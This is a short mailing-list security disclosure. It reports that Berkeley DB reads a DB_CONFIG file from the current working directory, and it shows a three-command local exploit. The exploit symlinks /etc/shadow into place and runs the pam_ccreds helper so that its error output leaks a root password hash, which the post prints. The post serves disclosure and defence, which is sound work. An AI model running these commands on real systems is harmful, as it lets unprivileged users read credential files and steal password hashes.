Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 11 Jun 2017 00:06:13 +0200
From: Jakub Wilk <>
Subject: Berkeley DB reads DB_CONFIG from cwd

Apparently Berkeley DB reads the DB_CONFIG configuration file from the current 
working directory by default[*]. This is surprising and AFAICT undocumented.

Here's how to exploit it against pam_ccreds:

    $ cat /etc/shadow
    cat: /etc/shadow: Permission denied
    $ ln -sf /etc/shadow DB_CONFIG
    $ /sbin/ccreds_chkpwd moo < /dev/null
    BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair

(The above was tested on Debian jessie.)

In the past, nss_db was also exploitable:

[*] More precisely, this seem to happen when you call db_create() with 
dbenv=NULL; or if you use the dbm_open() function.

Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ